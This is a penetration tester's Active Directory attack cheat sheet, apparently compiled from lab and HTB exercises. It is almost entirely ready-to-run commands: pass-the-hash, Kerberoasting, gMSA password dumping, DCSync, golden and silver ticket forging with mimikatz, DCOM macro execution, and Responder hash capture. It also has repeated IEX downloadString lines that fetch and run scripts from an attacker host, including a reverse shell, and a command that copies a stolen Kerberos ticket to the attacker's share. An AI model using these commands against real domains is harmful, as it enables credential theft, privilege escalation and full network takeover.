RUNDOWN OF USEFUL TECHNIQUES
(IPs LIKE 10.10.1.299 / 192.168.119.299 ARE PLACEHOLDERS: A .299 OCTET IS NOT VALID, SUBSTITUTE YOUR OWN)

======================================================

TGT USE WITH AUTHENTICATION

GET A TGT (THE kerbrute LINE AS NOTED; THE user01.ccache USED BELOW CAN BE PRODUCED WITH impacket-getTGT):
└─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345
└─$ impacket-getTGT domain.com/user01:password12345 -dc-ip 10.10.1.299      (WRITES user01.ccache)

USE IT. KERBEROS NEEDS THE TARGET HOSTNAME/FQDN, NOT AN IP (ADD IT TO /etc/hosts; ADD -dc-ip IF THE KDC DOESN'T RESOLVE).
THE "[email protected]" BELOW IS THE PAGE'S E-MAIL-OBFUSCATION ARTIFACT, READ IT AS user01@<target-fqdn>:
└─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected]

======================================================

CONNECTIONS VIA CRACKMAPEXEC / PTH / EVIL-WINRM

FIND THE ACCOUNT LOCKOUT POLICY FIRST IF ABLE (CHECK "Lockout threshold" BEFORE SPRAYING): 
PS C:\Users\computer.corp> net accounts

└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345

└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz

PASS-THE-HASH WITH THE NT HASH AS LOCAL ADMIN, DUMP THE SAM:
└─$ crackmapexec smb 10.10.1.299 -u administrator -H 'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam

pth-winexe WANTS LMHASH:NTHASH; NTLMv2 ONLY USES THE NT HALF, SO REPEATING THE NT HASH IN THE LM SLOT WORKS:
└─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd

└─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299

└─$ xfreerdp /u:user04 /d:domain.com /p:password12345 /v:10.10.1.299

└─$ rdesktop 10.10.1.299 -u user03 -p password12345

MIMIKATZ PTH: sekurlsa::pth SPAWNS A NEW POWERSHELL WINDOW ON THE INTERACTIVE DESKTOP, SO DO THIS FROM AN RDP/CONSOLE SESSION.
whoami IN THAT WINDOW STILL SHOWS THE ORIGINAL USER; ONLY NETWORK AUTHENTICATION USES THE INJECTED HASH.

mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe

THEN FROM THAT WINDOW (MAYBE...):
C:\tmp>.\psexec.exe \\dc-dc01 cmd.exe

======================================================

SCRIPTS

SERVICE ACCOUNTS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')

LIST USERS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')

LIST EVERYTHING
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')

SPECIFY A NAME BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')

POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')

CHECK CREDENTIALS BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1') <-- ONLY TO VERIFY

KERBEROAST
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')

REVERSE SHELL (NISHANG)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1')

======================================================

KERBEROAST - ANY DOMAIN USER CAN DO THIS, NO ADMIN NEEDED: EVERY AUTHENTICATED USER MAY REQUEST A TGS FOR ANY SPN.
WHAT YOU ARE LOOKING FOR IS A SERVICE ACCOUNT (USER WITH AN SPN) WHOSE PASSWORD IS WEAK ENOUGH TO CRACK OFFLINE.

IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')

Invoke-Kerberoast -OutputFormat Hashcat | fl
└─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt      (13100 = $krb5tgs$23$ RC4; AES TICKETS ARE 19600 / 19700)

======================================================

ADD A DNS A RECORD ON THE DC (AD-INTEGRATED DNS OVER LDAP, dnstool.py FROM krbrelayx) (FROM HTB INTELLIGENCE)
BY DEFAULT ANY AUTHENTICATED DOMAIN USER CAN CREATE RECORDS IN THE ZONE. -d IS THE IP THE NAME RESOLVES TO (YOUR LISTENER), LAST ARG IS THE DC.

python3 dnstool.py -u 'intelligence\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154

VERIFY
└─$ nslookup   
> server 10.129.95.154
> webstuff.intelligence.htb

======================================================

IF YOU SEE gMSA RIGHTS (ReadGMSAPassword IN BLOODHOUND) (FROM HTB INTELLIGENCE)

└─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb

THE ACCOUNT MUST BE IN PrincipalsAllowedToRetrieveManagedPassword FOR THE gMSA, OTHERWISE NOTHING COMES BACK.

OUTPUT IS account:::NTHASH, THE NT HASH OF THE gMSA (USABLE WITH -hashes :NTHASH, NO CRACKING NEEDED):
svc_int$:::16cba97b4bc423795585b0b4bcee5047

======================================================

TIME SYNC (KERBEROS REJECTS MORE THAN 5 MIN OF CLOCK SKEW: KRB_AP_ERR_SKEW / "Clock skew too great")

└─$ sudo timedatectl set-ntp false      (STOP NTP FROM RESETTING THE CLOCK)
└─$ sudo rdate -n dc.intelligence.htb

OPTIONAL: sudo ntpdate 10.129.95.154

======================================================

DC SYNC (NEEDS THE Replicating Directory Changes / Changes All RIGHTS, I.E. DOMAIN ADMIN BY DEFAULT; ASKS THE DC TO REPLICATE LIKE ANOTHER DC WOULD, NOTHING RUNS ON THE DC. /user:krbtgt GIVES THE HASH THE GOLDEN TICKET NEEDS)

mimikatz # lsadump::dcsync /user:Administrator

======================================================

CONSTRAINED DELEGATION (S4U2SELF/S4U2PROXY) WITH THE gMSA ACCOUNT (svc_int$)
OFTEN FILED UNDER "SILVER TICKET", BUT THIS TICKET IS ISSUED BY THE KDC, NOT FORGED: IT ONLY WORKS BECAUSE svc_int$ IS ALLOWED TO DELEGATE TO THAT SPN.
-hashes IS LMHASH:NTHASH; WITH ONLY THE NT HASH FROM gMSADumper USE :NTHASH

└─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator 'intelligence.htb/svc_int$' -hashes :HASH

THE TARGET IS THE HOST FROM THE SPN (KERBEROS NEEDS THE NAME, NOT THE IP):
└─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb

======================================================

SILVER TICKET (kerberos::golden WITH /target /service /rc4:<SERVICE ACCOUNT NT HASH>; IT IS ONLY A GOLDEN TICKET WHEN /krbtgt IS USED)

C:\>whoami /user (LOOKING FOR THE SID; DROP THE LAST RID COMPONENT TO GET THE DOMAIN SID)

mimikatz # kerberos::purge
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt

mimikatz # kerberos::list

READOUT TO GOLDEN:  /user /domain /sid /target /service:HTTP /rc4

NOTE: /rc4 TAKES THE SERVICE ACCOUNT'S NT HASH, NOT THE CLEAR-TEXT PASSWORD... COMPUTE THE NT HASH FIRST.
THE FORGED TGS IS ONLY GOOD FOR THAT SERVICE ON THAT HOST, AND THE DC IS NEVER CONTACTED.
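The NT hash that /rc4, /ntlm and impacket's -hashes expect is MD4 over the UTF-16LE encoding of the password. The following is an added example (my code, not from mimikatz or impacket) that computes it in pure Python, so it also works on systems where OpenSSL 3 has disabled MD4 in hashlib; the passwords fed to it at the bottom are sample values.

```python
"""NT hash (MD4 over UTF-16LE) from a cleartext password, for mimikatz /ntlm and /rc4
and impacket -hashes.  Pure-Python MD4 (RFC 1320) because hashlib.new('md4') is disabled
in OpenSSL 3 builds.  Added example for these notes, not part of any tool."""
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # well-known LM hash of an empty password


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 digest per RFC 1320 (three rounds of 16 steps over 64-byte blocks)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"                 # padding: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # (function, message-word order, shift schedule, additive constant) for each round
    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0x00000000),
        (g, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999),
        (h, [(0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4] for i in range(16)], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
            for i in range(16):
                a = _rotl((a + fn(b, c, d) + x[order[i]] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c        # rotate registers so the next step updates old d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lowercase hex (what /ntlm and /rc4 take)."""
    return md4(password.encode("utf-16le")).hex()


def impacket_hashes(password: str) -> str:
    """Value for impacket's -hashes LMHASH:NTHASH; the empty LM hash is the usual filler."""
    return f"{EMPTY_LM}:{nt_hash(password)}"


if __name__ == "__main__":
    for pw in ("", "password", "password12345"):   # sample passwords, not from the lab
        print(f"{pw!r:18} /ntlm:{nt_hash(pw)}")
    print("impacket -hashes", impacket_hashes("password12345"))
```

The RFC 1320 vectors (MD4("") = 31d6cfe0..., MD4("abc") = a448017a...) and the textbook NT hash of "password" (8846f7ea...) are the sanity checks; an empty password gives the same value as MD4("") because UTF-16LE of "" is empty.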

======================================================

GOLDEN TICKET (NEEDS THE krbtgt NT HASH: DUMP IT ON THE DC OR GET IT WITH DCSYNC)

C:\Tools\active_directory> psexec.exe \\dc01 cmd.exe
EXPECT ACCESS DENIED HERE: THE KDC STILL ISSUES A cifs/dc01 TGS, WHICH STAYS CACHED, HENCE THE kerberos::purge BELOW

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch           (ON THE DC; GIVES THE krbtgt HASH)
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
mimikatz # misc::cmd                      (NEW cmd THAT CARRIES THE FORGED TGT)

C:\Users\user02.corp> psexec.exe \\dc01 cmd.exe

/user CAN BE ANY NAME; /sid MUST BE THE DOMAIN SID (whoami /user MINUS THE LAST RID COMPONENT)

======================================================

DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT; NEEDS LOCAL ADMIN ON THE TARGET FOR THE DEFAULT DCOM LAUNCH PERMISSIONS)
SHOW AVAILABLE METHODS - LOOKING FOR Workbooks (Open) AND Run

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$com | Get-Member

CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD)
Sub mymacro()
    Shell ("notepad.exe")
End Sub

SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO.
Workbooks.Open FAILS UNLESS THE systemprofile Desktop FOLDER EXISTS; SysWOW64 IS THE PATH FOR 32-BIT OFFICE, USE System32 FOR 64-BIT OFFICE.
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$LocalPath = "C:\Users\user05_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")

======================================================

SERVICE TICKET REQUEST
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets

PS C:\tmp> Add-Type -AssemblyName System.IdentityModel
PS C:\tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com'
PS C:\tmp> klist

THEN MIMIKATS
sekurlsa::tickets - we see the ticket for HTTP
kerberos::list /export

THEN SEND THE FILE TO ATTACK COMPUTER
PS C:\tmp> copy .\2-40a50000-client06$@HTTP~MSSQL.domain.com-SVCORP.COM.kirbi \\192.168.119.299\share\

THEN CRACK (kerberoast's tgsrepcrack.py TAKES THE .kirbi DIRECTLY)
└─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi

OR WITH JOHN / HASHCAT
kirbi2john mssql.kirbi > mssql.hash
john mssql.hash
hashcat -m 13100 mssql.hash /usr/share/wordlists/rockyou.txt      (TGS-REP RC4, THE $krb5tgs$23$ FORMAT Invoke-Kerberoast -OutputFormat Hashcat EMITS; IF hashcat REJECTS THE kirbi2john OUTPUT, STICK WITH john)
hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt      <-- 5600 IS NetNTLMv2, I.E. WHAT RESPONDER CAPTURES (BELOW), NOT A KERBEROS TICKET

======================================================

POWERVIEW

IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')

Get-NetSession -ComputerName client06 (WORKED)

Get-NetLoggedon -ComputerName client06 (WORKED)

======================================================

RESPONDER
└─$ sudo responder -I tun0

THEN TRIGGER AN SMB AUTHENTICATION FROM THE WINDOWS BOX TO THE RESPONDER HOST (THE CLIENT SENDS ITS NetNTLMv2 RESPONSE; CRACK THAT WITH hashcat -m 5600)
PS C:\tmp\tickets> net use \\192.168.119.299\share /USER:domain.com\user04

ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!!
PS C:\tmp\tickets> net use \\192.168.119.299\share

MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.com\user03)

======================================================

BLOODHOUND
└─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All

sudo neo4j console

NEO4J GUI - CHANGE THE DEFAULT neo4j:neo4j PASSWORD AT http://localhost:7474 (BLOODHOUND LOGS IN TO NEO4J WITH IT)

bloodhound

IMPORT THE JSON FILES FROM bloodhound.py (DRAG INTO THE GUI OR "UPLOAD DATA")

======================================================

SMB FILE MOVEMENT

AUTHENTICATE: PS C:\tmp\tickets> net use \\192.168.119.299\share student /USER:student

MOVE FILES: PS C:\tmp\tickets> copy .\FILE.kirbi \\192.168.119.299\share\

TO STOP THE SHARE:  net use \\192.168.119.299\share /DELETE

======================================================

AD SCRIPT REFERENCE
ALL ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name                                # query the PDC emulator
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"   # corp.com -> DC=corp,DC=com
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"                         # 0x30000000 = normal user accounts
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop                                                       # every attribute of the object
    }
    Write-Host "------------------------"
}


AD SCRIPT REFERENCE
SERVICE ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"     # only SPNs containing "http"; use serviceprincipalname=* for every account with an SPN
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
}


AD SCRIPT REFERENCE
LIST USERS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"        # 0x30000000 = normal user accounts
$Searcher.FindAll()


AD SCRIPT REFERENCE
CHANGE SCRIPT TO GET A CERTAIN NAME
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="name=Domain Admins"
$Searcher.FindAll()